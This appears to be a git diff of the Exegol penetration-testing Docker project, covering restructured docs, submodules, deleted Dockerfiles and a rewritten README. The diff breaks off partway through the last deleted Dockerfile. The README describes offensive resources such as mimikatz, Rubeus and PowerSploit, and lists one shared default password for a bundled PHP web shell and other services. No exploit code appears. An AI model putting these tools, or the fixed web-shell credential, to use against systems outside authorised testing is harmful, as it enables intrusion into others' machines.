diff --git a/assets/PREVIEW.png b/.assets/PREVIEW.png similarity index 100% rename from assets/PREVIEW.png rename to .assets/PREVIEW.png diff --git a/assets/PREVIEW.xcf b/.assets/PREVIEW.xcf similarity index 100% rename from assets/PREVIEW.xcf rename to .assets/PREVIEW.xcf diff --git a/assets/README.png b/.assets/README.png similarity index 100% rename from assets/README.png rename to .assets/README.png diff --git a/assets/README.xcf b/.assets/README.xcf similarity index 100% rename from assets/README.xcf rename to .assets/README.xcf diff --git a/assets/example-display-sharing.gif b/.assets/example-display-sharing.gif similarity index 100% rename from assets/example-display-sharing.gif rename to .assets/example-display-sharing.gif diff --git a/.assets/exegol-help.png b/.assets/exegol-help.png new file mode 100644 index 00000000..a0f565eb Binary files /dev/null and b/.assets/exegol-help.png differ diff --git a/.assets/exegol-info.png b/.assets/exegol-info.png new file mode 100644 index 00000000..02e05bd7 Binary files /dev/null and b/.assets/exegol-info.png differ diff --git a/.assets/exegol-start.png b/.assets/exegol-start.png new file mode 100644 index 00000000..e5af1fd5 Binary files /dev/null and b/.assets/exegol-start.png differ diff --git a/assets/exegol_logo.ai b/.assets/exegol_logo.ai similarity index 100% rename from assets/exegol_logo.ai rename to .assets/exegol_logo.ai diff --git a/assets/exegol_logo.jpg b/.assets/exegol_logo.jpg similarity index 100% rename from assets/exegol_logo.jpg rename to .assets/exegol_logo.jpg diff --git a/assets/exegol_logo.png b/.assets/exegol_logo.png similarity index 100% rename from assets/exegol_logo.png rename to .assets/exegol_logo.png diff --git a/.gitignore b/.gitignore index 3cc555cf..b105634b 100644 --- a/.gitignore +++ b/.gitignore @@ -1,10 +1,111 @@ +# Byte-compiled / optimized / DLL files +__pycache__/ +*.py[cod] +*$py.class + +# C extensions +*.so + +# Distribution / packaging +.Python +env/ +build/ +develop-eggs/ +dist/ +downloads/ +eggs/ +.eggs/ +lib/ +lib64/ +parts/ +sdist/ +var/ +wheels/ +*.egg-info/ +.installed.cfg +*.egg + +# PyInstaller +# Usually these files are written by a python script from a template +# before PyInstaller builds the exe, so as to inject date/other infos into it. +*.manifest +*.spec + +# Installer logs +pip-log.txt +pip-delete-this-directory.txt + +# Unit test / coverage reports +htmlcov/ +.tox/ +.coverage +.coverage.* +.cache +nosetests.xml +coverage.xml +*.cover +.hypothesis/ + +# Translations +*.mo +*.pot + +# Django stuff: +*.log +local_settings.py + +# Flask stuff: +instance/ +.webassets-cache + +# Scrapy stuff: +.scrapy + +# Sphinx documentation +docs/_build/ + +# PyBuilder +target/ + +# Jupyter Notebook +.ipynb_checkpoints + +# pyenv +.python-version + +# celery beat schedule file +celerybeat-schedule + +# SageMath parsed files +*.sage.py + +# dotenv +.env + +# virtualenv +.venv +venv/ +ENV/ + +# Spyder project settings +.spyderproject +.spyproject + +# Rope project settings +.ropeproject + +# mkdocs documentation +/site + +# mypy +.mypy_cache/ + # Personal shared volume shared-data-volumes/ shared-resources/ # PyCharm and Python workspace .idea/ -venv # Build logs for debugging .build.log diff --git a/.gitmodules b/.gitmodules new file mode 100644 index 00000000..63445aa5 --- /dev/null +++ b/.gitmodules @@ -0,0 +1,8 @@ +[submodule "sources"] + path = exegol-docker-build + url = https://github.com/ShutdownRepo/Exegol-images.git + branch = main +[submodule "exegol-resources"] + path = exegol-resources + url = https://github.com/ShutdownRepo/Exegol-resources + branch = main diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index 6bdc684e..c71583b0 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md @@ -1,29 +1,17 @@ -# General -- the `master` branch is the stable version. Please work and submit PR on the `dev` branch only. It's the most up-to-date. Once the new features are good to go, I merge the `master` and `dev` branches once in a while. -- `exegol.py` is the python wrapper to manage the image/container from the host -- by default, the wrappers pulls the latest DockerHub pre-built image for the install and updates -- DockerHub automatic builds are configured as follows : automatic build for each commit on the `master` branch (`latest` tag), manual builds for the `dev` branch (`dev` tag) -- if you want to locally build your image with your changes, run the wrapper with the following options: `python3 exegol.py --mode sources install`. This will operate a `git pull` in order to make sure you have the latest code base (but your local edits shouldn't be overwritten). once the `git pull` is over, the wrapper will run a `docker build` -- `sources/install.sh` is the install script ran during the build process, it installs tools, downloads resources and so on +# Wrapper & images +- the `master` branch is the stable version. Only Pull Requests are allowed on this branch. +- the `dev` branch is used for active development. This is the bleeding-edge version, but is sometimes not as stable as the `master` (depending on the development cycle). +- the `Exegol` repository includes the exegol.py wrapper code base, and features a `exegol-docker-images` submodule tracking [Exegol-images](https://github.com/ShutdownRepo/Exegol-images). +- changes to the images/dockerfiles/tools/installs must be done on the [Exegol-images](https://github.com/ShutdownRepo/Exegol-images) repo. +- by default, the wrapper pulls the latest DockerHub pre-built image for the install and updates +- DockerHub automatic builds are configured as follows + - `nightly` image is built using the base Dockerfile whenever a commit is made on [Exegol-images](https://github.com/ShutdownRepo/Exegol-images) `dev` branch. + - `full` image is built using the base Dockerfile whenever a new tag is pushed on [Exegol-images](https://github.com/ShutdownRepo/Exegol-images). + - `ad`, `osint`, `web` and `light` images are built using specific Dockerfiles whenever a new tag is pushed on [Exegol-images](https://github.com/ShutdownRepo/Exegol-images). +- if you want to locally build your image with your changes, run `exegol install local`. If you have local changes to the dockerfiles, they won't be overwritten. +- any addition/question/edit/pull request to the wrapper? Feel free to raise issues on this repo, or contribute on the dev branch! +- any addition/question/edit/pull request to the docker images? GOTO [Exegol-images](https://github.com/ShutdownRepo/Exegol-images). -# Tools -- tools are installed in `/opt/tools` -- if the tools you want to add are GUI-based, you can create the install function of your tool and then call that function in `install_tools_gui()` -- if the tools you want to add are not GUI-based, you can do the install function for the tool and then call it in `install_tools()` -- make sure to start the install function with : `colorecho "[EXEGOL] Installing {name of the tool}"` -- make sure to add the tool to the list in `README_long.md` in the format : name of the tool (repo link) - -# Resources -*(e.g. a tool that cannot be used in Exegol but on the target for example, like Rubeus, mimikatz and so on)* -- resources are installed in `/opt/resources` -- just like the tools, make your install function, and then call it in `install_resources()`, start the function with the `colorecho`, report the new resource in `README_long.md` - -# Aliases -- you can set alias in the `sources/zsh/aliases` file -- aliases can point to binaries or script that are not in the path for example - -# History -- you can add history to the `sources/zsh/history` file -- the history is a helper to the users. Let's say I start to write "`secretsdump`", they'll be able to go through the commands in the history and then replace the placeholders with their values. I often rely on this history when I forget a tool or something, it can be helpful - -And last thing, if you want to add anything else that is not a tool, a resource, history, aliases, config or whatever, feel free to ask for it :) the idea behind Exegol is to have the perfect, community-driven, hacking environment :rocket: +Any other idea that falls outside this scope? +Any question that is left unanswered? +Feel free to reach out, I'll be happy to help and improve things, Exegol is a community-driven toolkit :rocket: diff --git a/Dockerfile b/Dockerfile deleted file mode 100644 index 1bd028dd..00000000 --- a/Dockerfile +++ /dev/null @@ -1,44 +0,0 @@ -# Author: Charlie BROMBERG (Shutdown - @_nwodtuhs) - -FROM kalilinux/kali-rolling - -ADD sources /root/sources -RUN chmod +x /root/sources/install.sh - -RUN /root/sources/install.sh install_base - -# WARNING: install_most_used_tools can't be used with other functions other than: install_base, install_resources, install_clean -# RUN /root/sources/install.sh install_most_used_tools - -# WARNING: the following installs (except: install_base, install_resources, install_clean) can't be used with install_most_used_tools -# this is a temporary limitation -RUN /root/sources/install.sh install_misc_tools -RUN /root/sources/install.sh install_wordlists_tools -RUN /root/sources/install.sh install_cracking_tools -RUN /root/sources/install.sh install_osint_tools -RUN /root/sources/install.sh install_web_tools -RUN /root/sources/install.sh install_c2_tools -RUN /root/sources/install.sh install_services_tools -RUN /root/sources/install.sh install_ad_tools -RUN /root/sources/install.sh install_mobile_tools -RUN /root/sources/install.sh install_iot_tools -RUN /root/sources/install.sh install_rfid_tools -RUN /root/sources/install.sh install_voip_tools -RUN /root/sources/install.sh install_sdr_tools -RUN /root/sources/install.sh install_network_tools -RUN /root/sources/install.sh install_wifi_tools -RUN /root/sources/install.sh install_forensic_tools -RUN /root/sources/install.sh install_cloud_tools -RUN /root/sources/install.sh install_steganography_tools -RUN /root/sources/install.sh install_reverse_tools -RUN /root/sources/install.sh install_crypto_tools -RUN /root/sources/install.sh install_GUI_tools -RUN /root/sources/install.sh install_code_analysis_tools - -RUN /root/sources/install.sh install_resources -RUN /root/sources/install.sh install_clean - -RUN rm -rf /root/sources - -WORKDIR /data -#CMD ["/bin/zsh"] diff --git a/README.md b/README.md index cf0afc75..76e070d3 100644 --- a/README.md +++ b/README.md @@ -1,112 +1,198 @@ -# Exegol +> **Want to quick start without reading anything else? [Click here](#-get-started)** + +# The Exegol project

DockerHub build type DockerHub build state - image size - GitHub code size in bytes - Python + image (compressed) max size
- current version + PyPi + Python latest commit on master - latest commit on dev -

+ latest commit on dev +
+ current version + current version + current version +
+

-**:bulb: TL;DR: Exegol is a community-driven hacking environment, powerful and yet simple enough to be used by anyone in day to day engagements.** +> Exegol is a community-driven hacking environment, powerful and yet simple enough to be used by anyone in day to day engagements. +> Script kiddies use Kali Linux, real pentesters use Exegol, megachads maintain it 👀 + +## Wrapper & images +Exegol is two things in one. Try it, and you'll stop using your old, unstable and risky environment, no more Kali Linux as host or single VM. +- **a python wrapper** making everyone's life easier. It handles all docker and git operations so you don't have to, and it allows for l33t hacking following best-practices. No more messed up history, libraries, and workspaces. **Now's the time to have a clean environment** with one container per engagement without the effort. Exegol handles multiple images and multiple containers. + - Want to test a new tool without risking messing up your environment? Exegol is here, pop up a new container in 5 seconds and try the tool without risk or effort + - Like the idea of using docker containers without effort but don't want to sacrifice GUI tools like BloodHound and Burp? Exegol is here, new containers are created with X11 sharing by default allowing for GUI tools to work. + - Like the idea of using docker containers but want to use USB accessories, Wi-Fi, host's network interfaces, etc.? Exegol handles all that flawlessly + - Want to stop pentesting your clients with the same environment everytime, interconnecting everything and risking being a weak link? Exegol is here, pop multiple containers without breaking a sweat and lead by example! + - You like this idea but don't want to lose your work when quitting/removing a container? Exegol shares a workspace directory per container with your host, allowing you to work knowing your progress won't be lost. +- a set of pre-built **docker images** and dockerfiles that include a neat choice of tools, awesome resources, custom configs and many more. + - Fed up with the instability and poor choice of tools of Kali Linux ? Exegol is here, trying to correct all this by being community-driven. Want some not-so-famous tool to be added? Open an issue and let's talk do it! + - Tired of always having to open `man` or print the help for every tool because the syntax varies? Exegol includes a command history allowing you to just replace the placeholders with your values, saving you precious time + - Want to improve productivity? Exegol includes all sorts of custom configs and tweaks with ease of use and productivity in mind (colored output for Impacket, custom shortcuts and aliases, custom tool configs, ...). + - Want to build your own docker images locally? It's absolutely possible and the wrapper will help in the quest. + - Tired of always having to search github for your favorite privesc enumeration script? Exegol includes a set of resources, shared with all exegol containers and your host, including LinPEAS, WinPEAS, LinEnum, PrivescCheck, SysinternalsSuite, mimikatz, Rubeus, PowerSploit and many more. + +![info](./.assets/exegol-info.png) + +> Exegol was built with pentest engagements in mind, but it can also be used in CTFs, Bug Bounties, HackTheBox, OSCP, and so on. + +- 🔧 **Tools**: many tools that are either installed manually or with apt, pip, go etc. Some of those tools are in kali, some are not. Exegol doesn't come with only ultra-famous tools, you will find ones that the community loves to use, even if it's in dev/new/not famous. Some tools are pre-configured and/or customized (colored output, custom NtChallengeResponse in Responder, custom queries in BloodHound, ...) +- 💡 **Resources**: many resources can be useful during engagements. Those resources are not referred to as "tools" since they need to be run on a pwned target, and not on the attacker machine (e.g. mimikatz, rubeus, ...). +- 📜 **History**: a populated history file that allows exegol users to save time and brain space by not having to remember every tool option and argument or checking the "help" every time. +- 🚀 **Aliases**: a file containing aliases that can be handful when using manually installed tools, or doing common operations. +- 🔎 **Usage**: a powerful Python3 wrapper used to manage Exegol container and image very easily (handles every docker operations). + +## Project structure + +Below are some bullet points to better understand how Exegol works +- This repository ([Exegol](https://github.com/ShutdownRepo/Exegol)) contains the code for the Python wrapper. It's the entrypoint of the Exegol project. +- The [Exegol-images](https://github.com/ShutdownRepo/Exegol-images) repo is loaded as a submodule. It includes all necessary assets to build Docker images. +- The [Exegol-resources](https://github.com/ShutdownRepo/Exegol-resources) repo is loaded as a submodule. It includes all resources mentioned previously (LinPEAS, WinPEAS, LinEnum, PrivescCheck, SysinternalsSuite, mimikatz, Rubeus, PowerSploit and many more.). +- Getting started with the Exegol project comes down to using the wrapper, which can be installed through pip or with the sources directly (see. [get started](#fast_forward-get-started)). -Exegol is a fully configured docker with many useful additional tools, resources (scripts and binaries for privesc, credential theft etc.) and some configuration (oh-my-zsh, history, aliases, colorized output for some tools). It can be used in pentest engagements, bugbounty, CTF, HackTheBox, OSCP lab & exam and so on. Exegol's original fate was to be a ready-to-hack docker in case of emergencies during engagements. +# 🚀 Get started -The main features of Exegol are: -- [:wrench: Tools](#wrench-tools): many tools that are either installed manually or with apt, pip, go etc. Some of those tools are in kali, some are not. Exegol doesn't come with only ultra-famous tools, you will find ones that the community loves to use, even if it's in dev/new/not famous. Some tools are pre-configured and/or customized (colored output, custom NtChallengeResponse in Responder, custom queries in BloodHound, ...) -- [:bulb: Resources](#bulb-resources): many resources can be useful during engagements. Those resources are not referred to as "tools" since they need to be run on a pwned target, and not on the attacker machine (e.g. mimikatz, rubeus, ...). -- [:scroll: History](#scroll-history): a populated history file that allows exegol users to save time and brain space by not having to remember every tool option and argument or checking the "help" every time. -- [:rocket: Aliases](#rocket-aliases): a file containing aliases that can be handful when using manually installed tools, or doing common operations. -- [:mag_right: Usage](#mag_right-usage) : a powerful Python3 wrapper used to manage Exegol container and image very easily (handles docker operations like `docker pull`, `docker build`, `docker run`, `docker start`, `docker stop`, `docker ps`, `docker rm`, `docker inspect`). +> Keep in mind that the wrapper is one thing, but in order to use Exegol, at least one Exegol docker image must be installed. +> Installing the wrapper and running it will do the next steps (which can be a bit lengthy) -Below is an example of a Zerologon attack operated with Exegol. -![Example](assets/example-zerologon.gif) +## Pre-requisites +You need git, python3 and docker, and at least 20GB of free storage. +You also need python libraries listed in [requirements.txt](./requirements.txt) (installed automatically or manually depending on the installation method you choose). -Below is an example of a [ACE abuse/RBCD attack](https://www.thehacker.recipes/active-directory-domain-services/movement/abusing-aces) operated with Exegol -![Example](assets/example-rbcd.gif) +## Installation using pip + +Exegol's wrapper can be installed from pip repository. That's the entrypoint of the project, you'll be able to do all the rest from there. +``` +python3 -m pip install exegol +``` + +> Remember that pip install binaries in `~/.local/bin`, which then must be in the `PATH` environment variable. + +## Installation from sources + +Exegol's wrapper can also be installed from sources. The wrapper then knows how to self-update. -# :fast_forward: Quick start -Bear in mind that the install process can be long as it downloads a ~6GB image. ``` git clone https://github.com/ShutdownRepo/Exegol cd Exegol python3 -m pip install --user --requirement requirements.txt -python3 exegol.py start ``` -Add Exegol to PATH : -``` +### Add exegol command + +
+

On Linux

+ +The exegol wrapper can then be added to the `PATH` throw symlink for direct access. + +```bash sudo ln -s $(pwd)/exegol.py /usr/local/bin/exegol ``` -# :mag_right: Usage -A powerful Python wrapper allows to manage Exegol without having to know docker-fu. +
+ +
+

On Windows (powershell)

+ +The exegol wrapper can be added as a powershell command aliases and saved for persistence +in `$HOME\PowershellAliasesExport.txt` +then load from `$PROFILE` script at powershell startup. + +```powershell +$AliasFile = "$HOME\PowershellAliasesExport.txt" +Set-Alias -Name exegol -Value "$(pwd)\exegol.py" +Get-Alias -Name "exegol" | Export-Alias -Path $AliasFile +echo "Import-Alias '$AliasFile'" >> $PROFILE +``` + +
+ +## User configuration -- Install (pull or build) an image : `exegol install` +Exegol installs and uses a yaml configuration file, located in the user's home directory: `~/.exegol` ( +or `/home//.exegol`). +The configuration file indicates paths to three host directories shared with the containers: + +- "my resources": dedicated to the user to customize his environment and tools. Defaults + to `/home//.exegol/my-resources`. +- "exegol resources": official exegol resources from + the [Exegol-resources](https://github.com/ShutdownRepo/Exegol-resources) repo. Defaults + to `/path/to/Exegol/exegol-resources`. +- "private workspace": a dedicated workspace for each container, shared with the host. Defaults + to `/home//.exegol/workspaces`. + +## Exegol images + +It is possible to install an exegol image using the wrapper with the following command: `exegol install ` + +| Image name | Description | +|------------|----------------------------------------------------------------------------------------------------| +| full | Includes all the tools supported by Exegol (warning: this is the heaviest image) | +| nightly | (for developers and advanced users) contains the latest updates. This image can be unstable! | +| ad | Includes tools for Active Directory / internal pentesting only. | +| web | Includes tools for Web pentesting only. | +| light | Includes the lightest and most used tools for various purposes. | +| osint | Includes tools for OSINT. | + +# 🔎 Usage +Below are some examples of usage. For more examples, run the following command: `exegol -h` (action: install/start/stop/etc.). + +- Install an Exegol image : `exegol install` - Create/start/enter a container : `exegol start` -- Execute a specific command on a container (with stdout / stderr) : `exegol start -e bloodhound` -- Execute a specific command on a container as a daemon : `exegol exec -e bloodhound` +- Show info on containers and images : `exegol info` - Stop a container : `exegol stop` -- Remove a container or an image : `exegol remove` +- Remove a container : `exegol remove` +- Uninstall an image : `exegol uninstall` - Get help and advanced usage : `exegol --help` -![Example](assets/example-info.gif) - -By default, Exegol will start with display sharing allowing GUI-based programs to run, here is an example with BloodHound. - -![Example](assets/example-display-sharing.gif) - -# :closed_lock_with_key: Credentials -Some tools are pre-configured with the following credentials -| Element | User | Password | -| ------- | ---- | -------- | -| wso-webshell (PHP) | | exegol4thewin | -| neo4j database | neo4j | exegol4thewin | -| bettercap ui | bettercap | exegol4thewin | -| trilium | trilium | exegol4thewin | - -# :pushpin: Pre-requisites -You need python3, python3-pip, git, docker :whale:, and 15GB of free storage (*What did you expect? A fully featured pentesting environment for less than 2GB? If you've got ideas I'm all ears*). - -# :wrench: Tools -The tools installed in Exegol are mostly installed from sources in order to have the latest version when deploying Exegol. Some installs are made with go, pip, apt, gem etc. You will find most of the tools in `/opt/tools`. -- CrackMapExec (https://github.com/byt3bl33d3r/CrackMapExec) -- Impacket (https://github.com/SecureAuthCorp/impacket) -- BloodHound (https://github.com/BloodHoundAD/BloodHound) -- Ghidra (https://ghidra-sre.org/) -- Powershell Empire (https://github.com/BC-SECURITY/Empire) -- ffuf (https://github.com/ffuf/ffuf) -- shellerator (https://github.com/ShutdownRepo/shellerator) -- [and many others...](https://github.com/ShutdownRepo/Exegol/wiki/Tools) - -# :bulb: Resources -In addition to the many tools pre-installed and configured for some, you will find many useful pre-fetched resources like scripts and binaries in `/opt/resources`. There some pre-EoP enumeration scripts (EoP: Escalation of Privileges) and other useful binaries like Rubeus or mimikatz. -- Linux Smart Enumeration (lse.sh) (https://github.com/diego-treitos/linux-smart-enumeration) -- mimikatz (https://github.com/gentilkiwi/mimikatz) -- linPEAS & winPEAS (https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) -- sysinternals (https://docs.microsoft.com/en-us/sysinternals/downloads/) -- PowerSploit (https://github.com/PowerShellMafia/PowerSploit) -- [and many others...](https://github.com/ShutdownRepo/Exegol/wiki/Resources) - -# :scroll: History -When I hack, I often rely on my history. I don't have to remember command line options, syntax and such. This history is filled with commands that I used in engagements, bugbounties, ctf, oscp and so on. Of course, the values are placeholders that need to be changed with the appropriate ones in your context. -The history is easily usable with [oh-my-zsh](https://github.com/ohmyzsh/ohmyzsh), [zsh-autosuggestions](https://github.com/zsh-users/zsh-autosuggestions), and [fzf](https://github.com/junegunn/fzf) - -# :rocket: Aliases -Since many tools are manually installed in `/opt/tools/`, aliases could be heplful to use these without having to change directory manually. -Other aliases are set to save time while hacking (`http-server`, `php-server`, `urlencode`,`ipa`, ...). - -# :loudspeaker: Credits & thanks -Credits and thanks go to every infosec addicts that contribute and share but most specifically to [@th1b4ud](https://twitter.com/th1b4ud) for the base ["Kali Linux in 3 seconds with Docker"](https://thibaud-robin.fr/articles/docker-kali/). - -# :movie_camera: Introducing Exegol (in french w/ english subs) -

- -

+> ⚠️ remember that Exegol uses Docker images and containers. Understanding the difference is essential to understand Exegol. +> - **image**: think of it as an immutable template. They cannot be executed as-is and serve as input for containers. It's not possible to open a shell in an image. +> - **container**: a container rests upon an image. A container is created for a certain image at a certain time. It's possible to open a shell in a container. Careful though, once a container is created, updating the image it was created upon won't have any impact on the container. In order to enjoy the new things, a new container must be created upon that updated image. + +![help](.assets/exegol-help.png) + +By default, Exegol will create containers with display sharing allowing GUI-based programs to run, with network host sharing, and a few others things. +Below is an example of a GUI app running in an Exegol container. + +![display_sharing](.assets/example-display-sharing.gif) + +
+

Default container configuration

+ When creating a new container with `exegol start`, it gets the following configuration by default (which can be tweaked, see `exegol start -h`) + + - GUI (X11 sharing) enabled + - Host network sharing enabled (host's network interfaces are shared with the container) + - Timezone sharing enabled + - Exegol-resources sharing enabled (`/path/to/Exegol/exegol-resources` maps to `/opt/resources` in the container) + - Personal resources ("My resources") sharing enabled (`~/.exegol/my-resources` maps to `/my-resources` in the container) + - Workspace sharing enabled (`~/.exegol/workspaces/CONTAINER_NAME` maps to `/workspace` in the container) + + > Users should keep in mind that when a container is created, it's configuration cannot be modified. If you want another configuration, create another one. + + ![start_verbose](.assets/exegol-start.png) +
+ +
+

Credentials

+ Some tools are pre-configured with the following credentials + + | Element | User | Password | + | ------- | ---- | -------- | + | neo4j database | neo4j | exegol4thewin | + | bettercap ui | bettercap | exegol4thewin | + | trilium | trilium | exegol4thewin | + | wso-webshell (PHP) | | exegol4thewin | +
+ +# 👏 Credits +Credits and thanks go to every infosec addicts that contribute and share but most specifically to +- [@th1b4ud](https://twitter.com/th1b4ud) for the base ["Kali Linux in 3 seconds with Docker"](https://thibaud-robin.fr/articles/docker-kali/). +- [dramelac_](https://twitter.com/dramelac_) for working on [Exegol](https://github.com/ShutdownRepo/Exegol) (the wrapper) +- [LamaBzh](https://twitter.com/rode_tony) for working on [Exegol-images](https://github.com/ShutdownRepo/Exegol-images)** diff --git a/TODO.md b/TODO.md index 63595d74..f17d0d14 100644 --- a/TODO.md +++ b/TODO.md @@ -1,41 +1,10 @@ -# :memo: Things to start - Here are some things to do that I have in mind, I'll work on that asap. You can help if you feel like it! - - - - enable connections through SOCKS4a/5 or HTTP proxies so that all of Exegol can be used through that proxy, simulating a advanced internal offensive system (callable with a `--proxy` or `--socks` option) - - find a way to log commands and outputs for engagements: inspiration from https://github.com/TH3xACE/SCREEN_KILLER ? - - Check if the following freshly installed tools work nicely: bettercap, hostapd-wpe, iproute2 - - Tools to install: cfr, drozer, jre8-openjdk, jtool, ripgrep, revsocks, ssf, darkarmor,amber, tikitorch - - install tools for mobile applications pentest - - install https://github.com/aircrack-ng/rtl8814au - - install https://github.com/lexfo/rpc2socks - - Add precompiled binaries (i.e. sharpgpoabuse, and others) - - improve proxychains conf ? - - add static nmap binary install for resources - - add JSP webshell (test all https://github.com/tennc/webshell/tree/master/jsp) - - improve error handling (see https://github.com/ShutdownRepo/Exegol/issues/29) - - make the wrapper remove the container if it's unable to start - - add ssh special commands to history (socks proxy, local/remote port forwarding) - - add an option to mount an encrypted volume - - update CONTRIBUTING.md - - limits to actual packaging method - - 2 install functions can't call the same tool installation twice. It will probably cause errors - - install functions don't take into account the history or the aliases - - resources and GUI-based tools don't have package installation for now - - classify GUI tools - - add dumpert dll and exe in windows resources - - check hackrf support (wrapper + tools) - - add: uncompyle, one_gadget - - add kerbrute - - replace is and is not with == and !=, danger ahead - - populate the wiki with the --help and with GIFs - - add manspider https://github.com/blacklanternsecurity/MANSPIDER - -# Split install - split install procedures in categories so that users can tell what "parts" to install, for example : exegol install web,osint,internal - we can also work with docker image? Dunno, gonna have to work on this. - we can also do things like add layers to the existing image/container like the following : exegol update osint,web - have DockerHub build different images per metapackage, we can then docker squash or have a dockerfile build the thing nicely - -# :rocket: Things to finish - - the wiki, with videos/GIFs (https://github.com/phw/peek) ? - - the contribution rules/info for contributors (CONTRIBUTING.md) +- add `--skip-images` to update function +- improve Windows integration +- add other actions to exegol wrapper like + - backup (generic and specific modes of backuping to save valuable info before a removal like: history, home dir files, etc.) + - export (allow export of exegol containers and images) + - import (allow import of exegol containers and images) +- handle encrypted volumes +- after interactive mode: show the full command for next time so that users don't always have to go through interactive mode +- add multi image selection to `exegol install` +- add templates and help for contributors: PRs and issues docs and templates, etc. \ No newline at end of file diff --git a/assets/example-info.gif b/assets/example-info.gif deleted file mode 100644 index 3a2f0155..00000000 Binary files a/assets/example-info.gif and /dev/null differ diff --git a/assets/example-rbcd.gif b/assets/example-rbcd.gif deleted file mode 100644 index e7e09f53..00000000 Binary files a/assets/example-rbcd.gif and /dev/null differ diff --git a/assets/example-zerologon.gif b/assets/example-zerologon.gif deleted file mode 100644 index 9e6ce6b4..00000000 Binary files a/assets/example-zerologon.gif and /dev/null differ diff --git a/assets/info.png b/assets/info.png deleted file mode 100644 index 02e7944f..00000000 Binary files a/assets/info.png and /dev/null differ diff --git a/dockerfiles/ad.dockerfile b/dockerfiles/ad.dockerfile deleted file mode 100644 index a6389fcf..00000000 --- a/dockerfiles/ad.dockerfile +++ /dev/null @@ -1,42 +0,0 @@ -# Author: Charlie BROMBERG (Shutdown - @_nwodtuhs) - -FROM kalilinux/kali-rolling - -ADD sources /root/sources -RUN chmod +x /root/sources/install.sh - -RUN /root/sources/install.sh install_base - -# WARNING: install_most_used_tools can't be used with other functions other than: install_base, install_resources, install_clean -#RUN /root/sources/install.sh install_most_used_tools - -# WARNING: the following installs (except: install_base, install_resources, install_clean) can't be used with install_most_used_tools -# this is a temporary limitation -RUN /root/sources/install.sh install_misc_tools -RUN /root/sources/install.sh install_wordlists_tools -# RUN /root/sources/install.sh install_cracking_tools -# RUN /root/sources/install.sh install_osint_tools -RUN /root/sources/install.sh install_web_tools -RUN /root/sources/install.sh install_c2_tools -RUN /root/sources/install.sh install_services_tools -RUN /root/sources/install.sh install_ad_tools -# RUN /root/sources/install.sh install_mobile_tools -# RUN /root/sources/install.sh install_iot_tools -# RUN /root/sources/install.sh install_rfid_tools -# RUN /root/sources/install.sh install_sdr_tools -RUN /root/sources/install.sh install_network_tools -# RUN /root/sources/install.sh install_wifi_tools -# RUN /root/sources/install.sh install_forensic_tools -# RUN /root/sources/install.sh install_cloud_tools -# RUN /root/sources/install.sh install_steganography_tools -# RUN /root/sources/install.sh install_reverse_tools -RUN /root/sources/install.sh install_GUI_tools -#RUN /root/sources/install.sh install_code_analysis_tools - -RUN /root/sources/install.sh install_resources -RUN /root/sources/install.sh install_clean - -RUN rm -rf /root/sources - -WORKDIR /data -#CMD ["/bin/zsh"] diff --git a/dockerfiles/light.dockerfile b/dockerfiles/light.dockerfile deleted file mode 100644 index 57cf76e6..00000000 --- a/dockerfiles/light.dockerfile +++ /dev/null @@ -1,42 +0,0 @@ -# Author: Charlie BROMBERG (Shutdown - @_nwodtuhs) - -FROM kalilinux/kali-rolling - -ADD sources /root/sources -RUN chmod +x /root/sources/install.sh - -RUN /root/sources/install.sh install_base - -# WARNING: install_most_used_tools can't be used with other functions other than: install_base, install_resources, install_clean -RUN /root/sources/install.sh install_most_used_tools - -# WARNING: the following installs (except: install_base, install_resources, install_clean) can't be used with install_most_used_tools -# this is a temporary limitation -RUN /root/sources/install.sh install_misc_tools -#RUN /root/sources/install.sh install_wordlists_tools -#RUN /root/sources/install.sh install_cracking_tools -#RUN /root/sources/install.sh install_osint_tools -#RUN /root/sources/install.sh install_web_tools -#RUN /root/sources/install.sh install_c2_tools -#RUN /root/sources/install.sh install_services_tools -#RUN /root/sources/install.sh install_ad_tools -#RUN /root/sources/install.sh install_mobile_tools -#RUN /root/sources/install.sh install_iot_tools -#RUN /root/sources/install.sh install_rfid_tools -#RUN /root/sources/install.sh install_sdr_tools -#RUN /root/sources/install.sh install_network_tools -#RUN /root/sources/install.sh install_wifi_tools -#RUN /root/sources/install.sh install_forensic_tools -#RUN /root/sources/install.sh install_cloud_tools -#RUN /root/sources/install.sh install_steganography_tools -#RUN /root/sources/install.sh install_reverse_tools -#RUN /root/sources/install.sh install_GUI_tools -#RUN /root/sources/install.sh install_code_analysis_tools - -RUN /root/sources/install.sh install_resources -RUN /root/sources/install.sh install_clean - -RUN rm -rf /root/sources - -WORKDIR /data -#CMD ["/bin/zsh"] diff --git a/dockerfiles/osint.dockerfile b/dockerfiles/osint.dockerfile deleted file mode 100644 index 8712cfba..00000000 --- a/dockerfiles/osint.dockerfile +++ /dev/null @@ -1,42 +0,0 @@ -# Author: Charlie BROMBERG (Shutdown - @_nwodtuhs) - -FROM kalilinux/kali-rolling - -ADD sources /root/sources -RUN chmod +x /root/sources/install.sh - -RUN /root/sources/install.sh install_base - -# WARNING: install_most_used_tools can't be used with other functions other than: install_base, install_resources, install_clean -#RUN /root/sources/install.sh install_most_used_tools - -# WARNING: the following installs (except: install_base, install_resources, install_clean) can't be used with install_most_used_tools -# this is a temporary limitation -RUN /root/sources/install.sh install_misc_tools -#RUN /root/sources/install.sh install_wordlists_tools -#RUN /root/sources/install.sh install_cracking_tools -RUN /root/sources/install.sh install_osint_tools -#RUN /root/sources/install.sh install_web_tools -#RUN /root/sources/install.sh install_c2_tools -#RUN /root/sources/install.sh install_services_tools -#RUN /root/sources/install.sh install_ad_tools -#RUN /root/sources/install.sh install_mobile_tools -#RUN /root/sources/install.sh install_iot_tools -#RUN /root/sources/install.sh install_rfid_tools -#RUN /root/sources/install.sh install_sdr_tools -#RUN /root/sources/install.sh install_network_tools -#RUN /root/sources/install.sh install_wifi_tools -#RUN /root/sources/install.sh install_forensic_tools -#RUN /root/sources/install.sh install_cloud_tools -#RUN /root/sources/install.sh install_steganography_tools -#RUN /root/sources/install.sh install_reverse_tools -#RUN /root/sources/install.sh install_GUI_tools -#RUN /root/sources/install.sh install_code_analysis_tools - -RUN /root/sources/install.sh install_resources -RUN /root/sources/install.sh install_clean - -RUN rm -rf /root/sources - -WORKDIR /data -#CMD ["/bin/zsh"] diff --git a/dockerfiles/web.dockerfile b/dockerfiles/web.dockerfile deleted file mode 100644 index 8a9e4c48..00000000 --- a/dockerfiles/web.dockerfile +++ /dev/null @@ -1,42 +0,0 @@ -# Author: Charlie BROMBERG (Shutdown - 